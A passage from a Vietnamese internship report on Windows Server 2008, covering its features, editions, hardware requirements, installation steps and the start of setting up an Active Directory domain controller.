của một trong những nguồn cung cấp điện không ảnh hưởng đến hoạt động hệ thống bình
thường. Cũng vậy với hệ thống lưu trữ của máy chủ. Không giống như một máy tính để
bàn trung bình có sử dụng một ổ cứng duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ
đĩa cứng làm việc trong một RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián
đoạn trong quy trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot
swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng cho phép
bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài ra, kể từ khi
tất cả các dữ liệu nhân viên đang được lưu trữ trên mạng, nếu máy trạm của người dùng
không giữa ngày làm việc, nhân viên có thể truy cập các tập tin tương tự từ máy trạm
khác.
- Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất cả người
dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay từ bàn làm việc,
tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:
o Tập trung lưu trữ dữ liệu ( RAID Array )
o Network Attached Storage (NAS) thiết bị
o Tháp đĩa CD / DVD
o Máy in và máy chủ Fax
- Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là khả năng
lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt, cập nhật, phần mềm
chống virus được cài đặt trên hệ thống của bạn là một điều cần thiết. Trong một văn
phòng của 10 người hoặc ít hơn, hệ thống có thể được duy trì riêng. Bất cứ điều gì nhiều
16Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
hơn thế, tuy nhiên, có thể trở thành một gánh nặng thực sự. Trong những trường hợp này,
một gói phần mềm chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào một
giải pháp duy nhất có ý nghĩa hơn.
- Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một cách thường
xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên được lưu trữ tại một địa
điểm, bản sao lưu có thể được thực hiện đáng tin cậy và nhanh chóng. Vì vậy, bạn sẽ
không bao giờ cần phải lo lắng về những dữ liệu được lưu trữ trên những gì máy trạm
như bạn làm trong một mạng peer-to-peer. Ngày nay, hầu hết các loại phương tiện truyền
thông có thể được sử dụng cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng, đĩa
CD, DVD, lưu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là
chấp nhận được. Sự lựa chọn của bạn của phương tiện truyền thông sẽ phụ thuộc vào yêu
cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân sách của bạn và nhu cầu lưu giữ dữ liệu
của bạn, bất kỳ trong số này sẽ là một giải pháp chấp nhận được. Hãy chắc chắn rằng bạn
có ít nhất một bản sao lưu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.
CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008
I. GIỚI THIỆU WINDOWS SERVER 2008
Microsoft Windows Server 2008 là thế hệ kế tiếp của hệ điều hành Windows
Server, có thể giúp các chuyên gia công nghệ thông tin có thể kiểm soát tối đa cơ
sở hạ tầng của họ và cung cấp khả năng quản lý và hiệu lực chưa từng có, là sản
phẩm hơn hẳn trong việc đảm bảo độ an toàn, khả năng tin cậy và môi trường máy
chủ vững chắc hơn các phiên bản trước đây.
Windows Server 2008 cung cấp những giá trị mới cho các tổ chức bằng việc
bảo đảm tất cả người dùng đều có thể có được những thành phần bổ sung từ các
dịch vụ từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng vượt trội
bên trong hệ điều hành và khả năng chuẩn đoán, cho phép các quản trị viên tăng
được thời gian hỗ trợ cho các doanh nghiệp.
Windows Server 2008 được thiết kế để cung cấp cho các tổ chức có được
nền tảng sản xuất tốt nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm
17Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
việc đến những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và
những cải thiện mạnh mẽ cho hệ điều hành cơ bản.
Cải thiện hệ điều hành cho máy chủ Windows.Thêm vào tính năng mới,
Windows Server 2008 cung cấp nhiều cải thiệm tốt hơn cho hệ điều hành cơ bản so
với hệ điều hành Windows Server 2003.
Những cải thiện có thể thấy được gồm có các vấn đề về mạng, các tính năng
bảo mật nâng cao, truy cập ứng dụng từ xa, quản lý role máy chủ tập trung, các
công cụ kiểm tra độ tin cậy và hiệu suất, nhóm chuyển đổi dự phòng, sự triển khai
và hệ thống file.
II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008
1. Công cụ quản trị Server Manager
Server Manager là một giao diện điều khiển được thiết kế để tổ chức và quản
lý một server chạy hệ điều hành Windows Server 2008. Người quản trị có thể sử
dụng Server Manager với những nhiều mục đích khác nhau.
- Quản lý đồng nhất trên một server
- Hiển thị trạng thái hiện tại của server
- Nhận ra các vấn đề gặp phải đối với các role đã đƣợc cài đặt một cách dễ dàng
hơn
- Quản lý các role trên server, bao gồm việc thêm và xóa role
- Thêm và xóa bỏ các tính năng
- Chẩn đoán các dấu hiệu bất thường
- Cấu hình server: có 4 công cụ (Task Scheduler, Windows Firewall, Services và
WMI Control).
- Cấu hình sao lưu và lưu trữ: các công cụ giúp bạn sao lưu và quản lý ổ đĩa là
Windows Server Backup và Disk Management đều nằm trên Server Manager.
18Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. Windows Server Core
- Server Core là một tính năng mới trong Windows Server 2008. Nó cho phép có
thể cài đặt với mục đích hỗ trợ đặc biệt và cụ thể đối với một số role.
- Tất cả các tương tác với Server Core được thông qua các dòng lệnh.
Server Core mang lại những lợi ích sau:
+Giảm thiểu được phần mềm, vì thế việc sử dụng dung lượng ổ đĩa cũng được
giảm. Chỉ tốn khoảng 1GB khi cài đặt.
+ Bởi vì giảm thiểu được phần mềm nên việc cập nhật cũng không nhiều.
+ Giảm thiểu tối đa những hành vi xâm nhập vào hệ thống thông qua các port được
mở mặc định.
+ Dễ dàng quản lý.
- Server Core không bao gồm tất cả các tính năng có sẵn trong những phiên bản cài
đặt Server khác. Ví dụ như .NET Framework hoặc Internet Explorer.
3. PowerShell
- PowerShell là một tập hợp lệnh. Nó kết nối những dòng lệnh shell với một ngôn
ngữ script và thêm vào đó hơn 130 công cụ dòng lệnh(được gọi là cmdlets).Hiện
tại, có thể sử dụng PowerShell trong:
+ Exchange Server
+ SQL Server
+ Terminal Services
+ Active Directory Domain Services.
+ Quản trị các dịch vụ, xử lý và registry.
- Mặc định, Windows PowerShell chưa được cài đặt. Tuy nhiên bạn có thể cài đặt
nó một cách dễ dàng bằng cách sử dụng công cụ quản trị Server Manager và chọn
Features > Add Features
19Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
4. Windows Deloyment Services.
- Windows Deployment Services được tích hợp trong Windows Server 2008 cho
phép bạn cài đặt hệ điều hành từ xa cho các máy client mà không cần phải cài đặt
trực tiếp. WDS cho phép bạn cài đặt từ xa thông qua Image lấy từ DVD cài đặt.
Ngoài ra, WDS còn hỗ trợ tạo Image từ 1 máy tính đã cài đặt sẵn Windows và đầy
đủ các ứng dụng khác.
- Windows Deployment Serviece sử dụng định dạng Windows Image (WIM). Một
cải tiến đặc biệt với WIM so với RIS là WIM có thể làm việc tốt với nhiều nền
tảng phần cứng khác nhau.
5. Terminal Services.
- Terminal Services là một thành phần chính trên Windows Server 2009 cho phép
user có thể truy cập vào server để sử dụng những phần mềm.
- Terminal Services giúp người quản trị triển khai và bảo trì hệ thống phần mềm
trong doanh nghiệp một cách hiệu quả. Người quản trị có thể cài đặt các chương
trình phần mềm lên Terminal Server mà không cần cài đặt trên hệ thống máy
client, vì thế việc cập nhật và bảo trì phần mềm trở nên dễ dàng hơn.
- Terminal Services cung cấp 2 sự khác biệt cho người quản trị và người dùng cuối
- Dành cho người quản trị: cho phép quản trị có thể kết nối từ xa hệ thống quản trị
bằng việc sử dụng Remote Desktop Connection hoặc Remote Desktop.
- Dành cho người dùng cuối: cho phép người dùng cuối có thể chạy các chương
trình từ Terminal Services server.
6. Network Access Protection
- Network Access Protection (NAP) là một hệ thống chính sách thi hành (Health
Policy Enforcement) được xây dựng trong các hệ điều hành Windows Server 2008.
- Cơ chế thực thi của NAP:
+ Kiểm tra tình trạng an toàn của client.
+ Giới hạn truy cập đối với các máy client không an toàn.
20Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
+ NAP sẽ cập nhật những thành phần cần thiết cho các máy client không an toàn,
cho đến khi client đủ điều kiện an toàn.Cho phép client kết nối nếu client đã thỏa
điều kiện.
+ NAP giúp bảo vệ hệ thống mạng từ các client.
+ NAP cung cấp bộ thư viên API (Application Programming Interface), cho phép
các nhà
quản trị lập trình nhằm tăng tính bảo mật cho mình
7. Read-Only Domain Controllers
Read-Only Domain Controller (RODC) là một kiểu Domain Controller mới
trên Windows Server 2008.Với RODC, doanh nghiệp có thể dễ dàng triển khai các
Domain Controller ở những nơi mà sự bảo mật không được đảm bảo về bảo mật.
RODC là một phần dữ liệu của Active Directory Domain Services.
Vì RODC là một phần dữ liệu của ADDS nên nó lưu trữ mọi đối tượng,
thuộc tính và các chính sách giống như domain controller, tuy nhiên mật khẩu thì
bị ngoại trừ.
8. Công nghệ Failover Clustering.
Clustering là công nghệ cho phép sử dụng hai hay nhiều server kết hợp với
nhau để tạo thành một cụm server để tăng cường tính ổn định trong vận hành.Nếu
server này ngưng hoạt động thì server khác trong cụm sẽ đảm nhận nhiệm vụ mà
server ngưng hoạt động đó đang thực hiện nhằm mục đích hoạt động của hệ thống
vẫn bình thường. Quá trình chuyên giao gọi là fail-over.
Những phiên bản sau hỗ trợ:
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Server 2008 Itanium
21Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
9. Windows Firewall with Advance Security
Windows Firewall with Advance Security cho phép người quản trị có thể
cấu hình đa dạng và nâng cao để tăng cường tính bảo mật cho hệ thống.
Windows Firewall with Advance Security có những điểm mới:
Kiểm soát chặt chẽ các kết nối vào và ra trên hệ thống (inbound và
outbound)
IPsec được thay thế bằng khái niệm Connection Security Rule, giúp bạn có
thể kiểm soát và quản lý các chính sách, đồng thời giám sát trên firewall.
Kết hợp với Active Directory.
Hỗ trợ đầy đủ IPv6.
III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008
1. Công nghệ ảo hóa Hyper-V
Hyper-V là công nghệ ảo hóa server thế hệ mới của Microsoft, sự thay đổi
lớn nhất mà Microsoft mang lại so với phiên bản Windows Server 2003. Hyper-V
hoạt động trên nền hệ điều hành 64-bit. Với Hyper-V, người sử dụng có thể sở hữu
một nền tảng ảo hóa linh hoạt, bảo mật, tối đa hiệu suất và tiết kiệm chi phí:
Hyper-V có thể thích nghi với doanh nghiệp lớn với hàng nghìn máy tính
hoặc các doanh nghiệp nhỏ hay văn phòng chi nhánh. Hyper-V hỗ trợ bộ
nhớ ảo lên đến 64GB, đa bộ vi xử lý.
Khả năng bảo mật giống như các server vật lý. Kết hợp các cộng cụ bảo mật
Windows Firewall, Network Access Protection…do đó tính bảo mật tốt như
môi trường thật.
Hyper-V giúp khai thác tối đa hiệu suất sử dụng phần cứng server. Bằng
việc hợp nhất server, cho phép một server vật lý có thể đóng nhiều vai trò
của nhiều server. Từ đó, tiết kiệm được chi phí từ các khoảng mua server,
điện, không gian và bảo trì.
Hyper-V chỉ có thể hỗ trợ đến 32 bộ vi xử lý.
22Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. Processor Compatibility Mode
Cho phép di trú các máy ảo sang một máy chủ vật lý khác với một phiên bản
CPU khác (nhưng không phải là CPU của nhà sản xuất khác). Trước đây, để
chuyển một máy ảo Hyper-V sang một phần cứng khác, các CPU phải giống nhau,
điều đó yêu cầu người dùng thường phải mua lại phần cứng mới.
3. File Classification Infrastructure
FCI là một tính năng built-in cho phép các chuyên gia CNTT phân loại và
quản lý dữ liệu trong các máy chủ file. Dữ liệu có thể được phân loại với tác động
doanh nghiệp mức thấp, cao hoặc trung bình, sau đó người dùng có thể backup các
dữ liệu quan trọng nhất dễ dàng hơn và hiệu quả hơn.
4. Quản lý trong ỗ đĩa và file:
Cung cấp khả năng thay đổi kich thước phân vùng.
Shadow Copy hỗ trợ ổ đĩa quang, ổ đĩa mạng.
Distributed File System được cải tiến.
Cải tiến Failover Clustering.
Internet Storage Naming Server cho phép đăng ký, hủy đăng ký tập trung và
truy xuất tới các ổ đĩa cứng iSCS.
5. Cải tiến giao thức và mã hóa
o Hỗ trợ mã hóa 128 và 256 bit cho giao thức chứng thực Keberos.
o Hàm API mã hóa mới hỗ trợ mã hóa vòng elip và cải tiến quản lý chứng chỉ.
o Giao thức VPN mới Secure Socket Tunneling Protocol.
o AuthIP được sử dụng trong mạng VPN Ipsec.
o Giao thức Server Message Block 2.0 cung cấp các cải tiến trong truyền
thông.
6. Một số tính năng khác
Windows Deployment Services thay thế cho Automated Deployment
Services và Remote Installation Services.23
Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
IIS 7 thay thế IIS 6, tăng cường khả năng bảo mật, cải tiến công cụ chuẩn
đoán, hỗ trợ quản lý.
Có thành phần "Desktop Experience" cung cấp khả năng cải tiến giao diện.
IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008
Windows Server 2008 mang đến lợi ích trong bốn lĩnh vực:Web, Ảo hóa,
Bảo mật, Nền tảng vững chắc cho các hoạt động của tổ chức
1. Web
Windows Server 2008 cung cấp một nền tảng đồng nhất để triển khai dịch
vụ Web nhờ tích hợp IIS7.0,ASP.NET,Windows Communication Foundation và
Microsoft Windows SharePoint Services.
Lợi ich của IIS 7.0:
Tinh năng phân tích
Quản trị hiệu quả.
Nâng cao tính bảo mật.
Giảm chi phí hỗ trợ.
Giao diện thân thiện và tiện dụng
Hỗ trợ việc sao chép giữa các site.
Copy dễ dàng các thiết lập của trang web giữa các máy chủ web khác nhau
mà không cần phải thiết lập gì thêm.
Chính sách phân quyền quản trị các ứng dụng và các site rõ ràng
2. Ảo hóa :
Phiên bản 64 bit của Windows Server 2008 được tích hợp sẵn công nghệ ảo
hóa hypervisor :
Cho phép máy ảo tương tác trực tiếp với phần cứng máy chủ hiệu quả hơn.
Có khả năng ảo hóa nhiều hệ điều hành khác nhau trên cùng 1 phần cứng
máy chủ sẽ làm giảm chi phí, tăng hiệu suất sử dụng phần cứng, tối ưu hóa
hạ tầng, nâng cao tính sẵn sàng của máy chủ.
24Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tiết kiệm chi phí mua sắm bản quyền phần mềm.
Tich hợp và tập trung các ứng dụng phục vụ cho việc truy cập từ xa một
cách dễ dàng bằng cách sử dụng Terminal Services.
3. Bảo mật:
Các tính năng an ninh bao gồm: Network Access Protection, Read-Only
Domain Controller, BitLocker, Windows Firewall… cung cấp các mức bảo vệ
chưa từng có cho hệ thống mạng, dữ liệu và công việc của tổ chức.
3.1. Network Access Protection (NAP):
NAP dùng để thiết lập chính sách mạng đối với các máy trạm khi máy trạm
đó muốn kết nối váo hệ thống mạng của tổ chức. Yêu cầu an ninh đối với
máy trạm được kết nối với hệ thống mạng:
Đã cài đặt phầm mềm diệt virus.
Đã cập nhật phiên bản mới.
Đã cài đặt các bản và lỗi hệ thống hoặc đã cài đặt phần mềm firewall.
3.2. Read-Only Domain Controller (RODC):
Là một kiểu Domain Controller (DC).
- RODC chứa một bản sao các dữ liệu "chỉ đọc" của dữ liệu Active Directory
(AD).
- User không thẻ ghi trực tiếp vào RODC.
- RODC không chứa thông tin về mật khẩu trong AD, mà chỉ caching các
users được phép sử dụng ở đó.
RODC thích hợp cho việc triển khai ở các chi nhánh, nơi có điều kiện bảo mật
kém cũng như trình độ của nhân viên IT còn hạn chế.
3.3. BitLocker:
o Bảo vệ an toàn cho máy chủ, máy trạm, máy tính di động.
o Mã hóa nội dung của ổ đĩa nhằm ngăn cản
25Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
o Nâng cao khả năng bảo vệ dữ liệu: kết hợp chức năng mã hóa tập tin hệ
thống và kiểm tra tinh toàn vẹn của các thành phần khi boot.
o Toàn bộ tập tin hệ thống được mã hóa, gồm cả file swap và file hibernation.
3.4. Windows Firewall:
Ngăn chặn các lưu lượng mạng theo cấu hình và các ứng dụng dạng chạy để
bảo vệ mạng khỏi các chương trình và người dùng nguy hiểm.
Hỗ trợ ngăn chặn các thông tin vào và ra.
Sử dụng MMC snap-in ( Windows Firewall with Adbanced Security) để đơn
giản hóa việc cấu hình, quản trị.
V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008
1. Windows Server 2008: ứng dụng cho các trung tâm data lớn, ứng dụng nghiệp
vụ riêng,... khả năng mở rộng cao cho tới 64 bộ xử lý.
2. Windows Server 2008 Standard Edition
Windows Server 2008 Standard là một trong những phiên bản ít tốn kém
nhất của các phiên bản khác nhau có sẵn. Windows Server 2008 Stardard hỗ trợ
tới 4GB RAM và 4 bộ vi xử lý.
Chủ yếu nhắm mục tiêu và các doanh nghiệp vừa và nhỏ. Chỉ có thể nâng
cấp lên Windows Server 2008 Standard từ Windows 2000 Server và Windows
Server 2003 Standard Edition.
3. Windows Server 2008 Enterprise Edition
Windows Server 2008 Enterprise Edition cung cấp chức năng lớn hơn và có
khả năng mở rộng hơn so với bản tiêu chuẩn. Cũng như phiên bản Standard
Edition thì phiên bản Enterprise cũng có cả hai phiên bản 32-bit và 64-bit. Hỗ trợ 8
bộ xử lý và lên tới 64GB bộ nhớ RAM trên hệ thống 32-bit và 2TB RAM trên hệ
thống 64-bit.
Các tính năng khác của ấn bản Doanh nghiệp bao gồm hỗ trợ Clustering đến
8 nút và Active Directory Federated Services (AD FS).
26Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Các phiên bản Windows Server 2000, Windows 2000 Advanced Server,
Windows Server 2003 Standard Edition và Windows Server 2003 Enterprise
Edition đều có thể được nâng cấp lên Windows Server 2008 Enterprise Edition.
4. Windows Server 2008 Datacenter Edition
Phiên bản Datacenter đại diện cuối cùng của loạt sản phẩm máy chủ
Windows 2008 và mục tiêu là nhiệm vụ quan trọng đòi hỏi các doanh nghiệp ổn
định và mức độ thời gian hoạt động cao. Windows Server 2008 phiên bản
Datacenter là liên hệ chặt chẽ với các phần cứng cơ bản thông qua việc thực hiện
tùy chỉnh Hardware Abstraction Layer (HAL).
Windows server 2008 Datacenter cũng hỗ trợ hai phiên bản 32 bit và 64 bit.
Nó hỗ trợ 64GB bộ nhớ RAM trên nền 32 bit và lên tới 2TB RAM trên nền 64 bít.
Ngoài ra phiên bản này còn hỗ trợ tối thiểu là 8 bộ vi xử lý và tối đa là 64.
Để nâng cấp lên phiên bản này thì phải là các phiên bản Datacenter 2000 và
2003.
5. Windows Web Server 2008
Windows Web Server 2008 là một phiên bản của Windows Server 2008
được thiết kế chủ yếu cho mục đích cung cấp các dịch vụ web. Nó bao gồm
Internet Information Services (IIS) 7,0 cùng với các dịch vụ liên quan như
Simple Mail Transfer Protocol (SMTP) và Telnet. Nó cũng có các phiên bản
32-bit và 64-bit, phiên bản và hỗ trợ lên đến 4 bộ vi xử lý. RAM được giới
hạn 4GB và 32GB trên 32-bit và 64-bit hệ thống tương ứng.
Windows Web Server 2008 thiếu nhiều tính năng hiện diện trong các phiên
bản khác như phân nhóm,mã hóa ổ đĩa BitLocker, Multi I/O,Windows
Internet Naming Service (WINS),Removable Storage Management và SAN
Management.
27Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008
I. YÊU CẦU PHẦN CỨNGPhần cứng Yêu cầu tối thiểu Đề nghị
Bộ vi xử lý 1 Ghz (x86), 1,4 Ghz
(x64)
2Ghz hoặc lớn hơn
RAM 512MB RAM 2GB
Dung lượng trống 15GB 40GB
Windows Server 2008 hỗ trợ cả 2 cấu trúc vi xử lý 32-bit và 64-bit. Tuy
nhiên, phiên bản mới nhất là Windows Server 2008 R2, Windows Midmarket
Server và Windows Small Business với những tính năng đa dịch vụ, các phiên bản
này chỉ hỗ trợ cấu trúc vi xử lý 64-bit.
RAM hỗ trợ tối đa cho hệ thống 32-bit là 4GB khi chạy phiên bản
Standard Edition và 64GB khi chạy phiên bản Enterprise và Datacenter. Nếu
chạy hệ thống 64-bit, bộ nhớ RAM có thể hỗ trợ lên dến 32GB và 2TB RAM cho
phiên bản Enterprise và Datacenter. Thêm vào đó, Windows Server 2008 hỗ trợ
hệ thống Itanium, tuy nhiên chip xử lí Intel Itanium 2 nhân là cần thiết.
II. CÁC CÁCH CÀI ĐẶTCó 6 cách cài đặt Windows Server 2008
Tự cài đặt các nâng cấp
Cài đặt từ kịch bản
Sử dụng Sconfig
Visual Core Configurator 2008
Cài đặt bằng cách sử dụng Core Configurator 2.0
Cài đặt trực tiếp từ đĩa CD Windows Server 2008
III. NÂNG CẤP LÊN WINDOWS SERVER 2008Những phiên bản trước Nâng cấp lên Windows Server
28Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2008
Microsoft Windows Server 2003 R2 Standard,
Enterprise hoặc DatacenterEdition
Hỗ trợ đầy đủ
Microsoft Windows Server 2003 Service Pack
1(SP1) Standard, Enterprise hoặc Datacenter
Edition
Hỗ trợ đầy đủ
Microsoft Windows Server 2003 Service Pack
2 (SP2) Standard, Enterprise hoặc Datacenter
Edition
Hỗ trợ đầy đủ
Windows NT 4.0 Không hỗ trợ
Windows 2000 Server Không hỗ trợ
Windows XP Không hỗ trợ
Windows Vista Không hỗ trợ
Windows 7 Không hỗ trợ
Để nâng cấp lên phiên bản Windows Server 2008, cần phải chạy các hệ điều
hành ở cấp độ server. Không thể nâng cấp các phiên bản Windows dành cho người
dùng như Windows XP hoặc Windows Vista lên Windows Server 2008. Để nâng
cấp lên Windows Server 2008, hệ thống của bạn phải chạy Windows Server
2003. Việc nâng cấp từ Windows NT 4.0 và Windows 2000 Server không được hỗ
trợ. Việc nâng cấp từ những phiên bản Windows Server 2003 lên phiên bản
Windows Server 2008 Server Core không được hỗ trợ. Việc nâng cấp chỉ thực hiện
được ở những phiên bản giống nhau. Khi nâng cấp lên phiên bản Windows Server
2008, mọi cấu hình thiết lập, file và các chương trình đều được giữ lại
29Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
IV. CÀI ĐẶT WINDOWS SERVER 2008Đặt đĩa CD vào ổ đĩa, khởi động lại máy tính và bắt đầu tiến hành quá trình cài đặt.
Language to instalk : ngôn ngữ bạn muốn hiển thị.
Time and currency format : định dạng thời gian và tiền tệ.
Keyboard or input method : định dạng bàn phím và phương thức nhập chữ.Sau
khi lựa chọn, click Next để tiếp tục cài đặt
30Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Install now để bắt đầu cài đặt.
Lựa chọn phiên bản Windows Server thích hợp, ở đây chúng ta chọn phiên
bản Windows Server Standard without Hyper-V. Click Next để tiếp tục.
31Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tại bảng MICROSOFT PRE-RELEASE SOFTWARE LICENSE
TERMS là những điều khoản sử dụng sản phẩm của Microsoft. Đánh dấu
chọn vào I accept the license terms để chấp nhận những điều khoản đó và
click Next để tiếp tục.
32Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Custom (advaneced) để tiến hành cài đặt tùy chọn.
Tiếp theo là chọn ổ đĩa để cài dặt Windows. Tiếp tục click Next sau khi đã chọn ổ
đĩa cài đặt.
33Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Đợi cho đến khi hoàn tất cài đặt Windows Server 2008
Sau khi hệ thống hoàn tất cái đặt sẽ tự động đăng nhập vời tài khoản
Administrator, tuy nhiên mật khẩu đang ở trạng thái trống (blank) vì thế cần phải
thiết lập mật khẩu ở lần đăng nhập đầu tiên.
Click OK để tiến hành thay đổi mật khẩu.Sau đó đăng nhập vào bằng mật khẩu vừa
thay đổi.
Đến đây quá trình cài đặt kết thúc.
Tham khảo video tại: http://www.youtube.com/watch?v=vX3HKpzykZ4
34Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 5: DỰNG DOMAIN CONTROLLER
Giống như Windows Server 2003 sẽ vẫn cần chạy dcpromo từ nhắc lệnh
Run, tuy nhiên cần phải cài đặt Active Directory Domain Controller role, đầu
tiên bạn cài đặt role, sau đó chạy dcpromo.Vào Server Manager Roles
Add Roles
Xuất hiện trang Before You Begin, nhấn Next để tiếp tục.
35Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Active Directory Domain Services Add Required Features để cài đặt
thêm các tính năng này với Active Directory Server Role.
Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về Server
Role.
Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo
36Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Cài đặt được thực hiện thành công. Kích Close.
Trong bài này, chúng ta sẽ sử dụng 2 máy.
PC1: Là máy sử dụng Windows Server 2008.
37Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
PC2: Là máy sử dụng Client sử dụng Windows 7.
Quá trình cài đặt sẽ trải qua 2 bước chính:
Bước 1: Chỉnh Preferred DNS
- Ở bước này chúng ta sẽ chỉnh Preferred DNS về chính máy tính của chúng ta, ở
đây là ip 192.168.1.1.
Trong trường hợp giả sử chúng ta quên làm bước này, thì quá trình nâng cấp
vẫn diễn ra bình thường, và Windows sẽ tự chỉnh Preferred DNS về địa chỉ
192.168.1.1 Nhưng tốt nhất các bạn nên làm bước chỉnh này
Bước 2: Nâng cấp lên Domain Controller
- Bạn vào Start-> Chọn Run, gõ dcpromo và Enter, sau đó lần lượt làm theo các
bước sau:
38Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tiếp nào.
Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain Service
Installation Wizard. Kích Next.
Sau đó tiếp tục nhấn Next.
Trong trang Choose a Deployment Configuration Create a new domain in a
new forest..
39Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong trang Name the Forest Root Domain, nhập vào tên của miền trong hộp
nhập liệu FQDN of the forest room domain.Nhấn Next để tiếp tục.
40Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Nhấn Next để tiếp tục.
Trong trang Set Forest Functional Level, chọn Windows Server 2008. Nhấn Next
để tiếp tục.
41Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong trang Additional Domain Controller Options, Chọn DNS server và kích
Next.
Một hộp thoại sẽ xuất hiện nói răng không thể tạo đại biểu cho máy chủ
DNS này vì không thể tìm thấy vùng xác thực hoặc nó không chạy Windows DNS
server. Lý do cho điều này là vì đây là DC đầu tiên trên mạng. Nhấn Next để tiếp
tục.
